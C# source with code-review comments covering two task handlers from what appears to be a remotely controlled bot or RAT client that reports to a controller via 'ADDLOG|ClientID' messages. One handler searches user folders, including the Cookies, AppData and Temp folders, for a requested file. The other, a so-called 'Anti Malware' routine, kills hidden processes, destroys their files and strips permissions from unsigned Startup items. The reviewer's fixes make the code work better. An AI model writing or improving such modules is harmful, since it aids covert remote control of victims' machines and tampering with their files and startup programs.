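/// <summary>
/// Starts the file-search task: logs the task id and action, maps the
/// location label held in <c>loc</c> to a root directory and passes that root
/// together with <c>filename</c> to <c>WalkDirRecursive</c>.
/// </summary>
/// <remarks>
/// <c>loc</c>, <c>filename</c>, <c>taskid</c> and <c>action</c> are fields set outside
/// this method (presumably from the task request; confirm against the caller).
/// Only the fixed labels below are honoured, so <c>loc</c> can never select an
/// arbitrary path. <c>filename</c> is passed on unchecked.
/// NOTE(review): whether <c>WalkDirRecursive</c> follows reparse points or
/// constrains the file name cannot be seen from here.
/// </remarks>
public void Start()
{
    mwork.addinfo("Starting File Searcher - TaskID: " + taskid + " Action: " + action);

    string root;
    switch (loc)
    {
        case "Desktop":
            root = Environment.GetFolderPath(Environment.SpecialFolder.DesktopDirectory);
            break;
        case "Documents":
            root = Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments);
            break;
        case "Pictures":
            root = Environment.GetFolderPath(Environment.SpecialFolder.MyPictures);
            break;
        case "Videos":
            // Fix: this label used to resolve to SpecialFolder.MyMusic, so the
            // folder walked did not match the label the task asked for.
            // (SpecialFolder.MyVideos needs .NET Framework 4 or later.)
            root = Environment.GetFolderPath(Environment.SpecialFolder.MyVideos);
            break;
        case "Program Data":
            // May be null when the variable is not defined; handled below
            // instead of dereferencing it.
            root = Environment.GetEnvironmentVariable("PROGRAMDATA");
            break;
        case "Program Files":
            root = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles);
            break;
        case "Appdata Local":
            root = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData);
            break;
        case "Appdata Roaming":
            root = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
            break;
        case "Temp Folder":
            root = Path.GetTempPath();
            break;
        case "Cookies Folder":
            root = Environment.GetFolderPath(Environment.SpecialFolder.Cookies);
            break;
        default:
            // Unknown label: nothing is searched, as before.
            root = null;
            break;
    }

    // GetFolderPath returns an empty string when the folder does not exist and
    // the environment variable may be missing; skip the walk in both cases
    // rather than handing an unusable root to WalkDirRecursive.
    if (string.IsNullOrEmpty(root))
    {
        return;
    }

    WalkDirRecursive(root, filename);
}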
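/// <summary>
/// Runs the "Anti Malware" task: walks all running processes, terminates the
/// ones whose main-module file is flagged by <c>IsFileMalicious</c> and whose
/// window title fails <c>WindowIsVisible</c>, hands the file to
/// <c>DestroyFile</c>, then changes the ACL of every item in the per-user
/// Startup folder whose embedded signature does not verify, and finally
/// reports the result through <c>mwork</c>.
/// </summary>
/// <remarks>
/// Every stage is best-effort: all exceptions are swallowed, so a failure is
/// not visible in the report sent at the end.
/// NOTE(review): the verdict rests entirely on <c>IsFileMalicious</c>, the window
/// check and <c>WinTrust.VerifyEmbeddedSignature</c>, none of which are visible
/// here. Any item for which the signature check returns false is treated as
/// hostile, which presumably includes legitimate unsigned startup entries.
/// Confirm before relying on this on a production host.
/// </remarks>
public void Start()
{
    mwork.addinfo("[Anti Malware] Execution Parameters:" + excparams);
    mwork.addinfo("[Anti Malware] Successfully started Malware Cleaner...");

    try
    {
        try
        {
            foreach (Process p in Process.GetProcesses())
            {
                try
                {
                    // MainModule throws for processes this account may not
                    // inspect; those are skipped by the catch below.
                    string path = System.IO.Path.GetFullPath(p.MainModule.FileName);

                    if (IsFileMalicious(path) && !WindowIsVisible(p.MainWindowTitle))
                    {
                        try
                        {
                            p.Kill();
                            mwork.addlog("[Anti Malware] Killed Process: " + p.ProcessName);
                        }
                        catch
                        {
                            // Best-effort: the process may have exited or be protected.
                        }

                        // NOTE(review): the file is destroyed and the counter
                        // incremented even when Kill() failed, so the reported
                        // "Processes killed" figure can overstate what happened.
                        DestroyFile(path);
                        killed = killed + 1;
                    }
                }
                catch
                {
                    // Best-effort: inaccessible process, skip it.
                }
            }
        }
        catch
        {
            // Best-effort: process enumeration failed, continue with startup items.
        }

        string[] startupFiles = Directory.GetFiles(Environment.GetFolderPath(Environment.SpecialFolder.Startup));
        foreach (string startupFile in startupFiles)
        {
            if (WinTrust.VerifyEmbeddedSignature(startupFile) == false)
            {
                // NOTE(review): nothing is deleted here although the log line
                // says "Removed". An empty DirectorySecurity with inheritance
                // protection on and inherited rules not preserved is applied,
                // which leaves the item without access entries. The path is a
                // file, but it is wrapped in DirectoryInfo; confirm this is
                // intended and that it behaves as expected on files.
                System.IO.DirectoryInfo folderInfo = new System.IO.DirectoryInfo(startupFile);
                DirectorySecurity folderAcl = new DirectorySecurity();
                folderAcl.SetAccessRuleProtection(true, false);
                folderInfo.SetAccessControl(folderAcl);
                mwork.addlog("[Anti Malware] Removed Startup Item: " + startupFile);
            }
        }
    }
    catch
    {
        // Best-effort: a failure on one startup item aborts the rest of the loop.
    }

    // Fix: the thresholds are now tested from highest to lowest. Previously
    // "killed > 2" was tested before "killed > 5", so "Risk" was unreachable,
    // and a count of exactly 2 produced an empty priority field in the ADDLOG
    // message. A count of 2 is now reported as "Priority" (presumed intent).
    string priority;
    if (killed > 5)
    {
        priority = "Risk";
    }
    else if (killed >= 2)
    {
        priority = "Priority";
    }
    else if (killed == 1)
    {
        priority = "Log";
    }
    else if (killed == 0)
    {
        priority = "Info";
    }
    else
    {
        priority = "";
    }

    mwork.Send("ADDLOG|" + mwork.ClientID + "|" + priority + "|" + "Successfully finished Anti Malware Task. Processes killed: " + killed.ToString() + ".");
    mwork.addinfo("[Anti Malware] Processes killed: " + killed.ToString());
    mwork.addinfo("[Anti Malware] Files destroyed: " + fileskilled.ToString());
    mwork.addinfo("[Anti Malware] Successfully finished the Malware Cleaning!");
}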